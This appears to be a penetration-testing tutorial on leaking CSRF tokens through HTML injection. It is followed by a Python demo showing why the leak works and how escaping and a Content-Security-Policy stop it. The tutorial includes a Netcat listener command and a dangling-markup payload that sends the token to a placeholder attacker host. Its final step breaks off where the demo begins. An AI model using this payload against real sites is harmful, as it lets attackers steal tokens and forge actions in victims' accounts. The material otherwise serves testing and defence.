Cross-Site Request Forgery (CSRF) tokens are essential for protecting web applications from unauthorized actions. However, if an application is vulnerable to HTML injection or XSS, attackers can exploit these vulnerabilities to leak CSRF tokens. Understanding how to identify and exploit these weaknesses is crucial for penetration testers.
Understanding CSRF Token Leakage
CSRF tokens are typically included in POST requests so the server can verify that the request originated from its own pages. If an attacker can inject HTML into a page that also carries the CSRF token, they may be able to extract that token and use it to forge requests on the victim's behalf.
Key Characteristics of CSRF Token Leakage:
HTML Injection Vulnerabilities: If an application allows HTML injection, it can be exploited to leak sensitive information.
Remote Exploitation: This type of attack does not require the attacker to be on the same local network as the victim.
Testing for CSRF Token Leakage
To test for CSRF token leakage through HTML injection, follow these steps:
Log into the Target Application: Use valid credentials to access the application.
Identify an HTML Injection Point: Navigate to a feature that reflects user input, such as the account deletion confirmation page. Attempt to inject HTML into the input field (the example below is URL-encoded, so `%2f` stands for `/`). For example:
<h1>h1<u>underline<%2fu><%2fh1>
Inspect the Source: Check the page source to confirm that your HTML injection was successful. You should see your injected HTML reflected in the source code.
Set Up a Listener: Use Netcat to listen for incoming connections on a specified port:
nc -nlvp 8000
Craft the Payload: Create a payload that will send the CSRF token to your listening machine. For example:
<table%20background='%2f%2f<ATTACKER_IP>:PORT%2f
Trigger the Payload: While logged in as the victim, navigate to the URL that includes your crafted payload. For example:
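As an added example (not part of the original write-up), the following Python script shows why the dangling `<table background='//...` payload above exfiltrates the token, and how output encoding plus a Content-Security-Policy stop it. The route, token value, placeholder host `ATTACKER_HOST` and function names are all constructed for the demo, not taken from any real application.

```python
from html import escape

# Constructed sample values, not taken from the page: a placeholder token
# and the page's dangling-markup probe with a placeholder host.
DEMO_TOKEN = "demo-csrf-token-0123"
PROBE = "<table background='//ATTACKER_HOST:8000/"


def render_vulnerable(username: str, csrf_token: str) -> str:
    """Account-deletion page that reflects the name unescaped (the defect)."""
    return (
        f"<h2>Delete account for {username}?</h2>"
        '<form method="POST" action="/delete">'
        f'<input type="hidden" name="csrf" value="{csrf_token}">'
        "<button>Confirm</button></form>"
    )


def render_hardened(username: str, csrf_token: str) -> str:
    """Same page with the reflected value HTML-encoded, quotes included."""
    return render_vulnerable(escape(username, quote=True), csrf_token)


def csp_header() -> str:
    """Defence in depth: even if an injection slips through, background and
    image loads and form posts to other origins are refused by the browser."""
    return "default-src 'self'; img-src 'self'; form-action 'self'; base-uri 'self'"


def swallowed_by_unclosed_attribute(html: str, probe: str) -> str:
    """What a browser treats as the rest of the probe's unterminated URL:
    everything after the probe up to the next single quote.
    Returns '' when the probe is not present as live markup."""
    start = html.find(probe)
    if start == -1:
        return ""
    rest = html[start + len(probe):]
    end = rest.find("'")
    return rest if end == -1 else rest[:end]


def token_leaks(renderer, csrf_token: str = DEMO_TOKEN) -> bool:
    """Regression check: does the token end up inside the exfiltrated URL?"""
    page = renderer(PROBE, csrf_token)
    return csrf_token in swallowed_by_unclosed_attribute(page, PROBE)
```

The vulnerable renderer leaks the token because its own attributes use double quotes, so nothing terminates the injected single-quoted URL before the hidden input; the hardened renderer turns the probe into inert text.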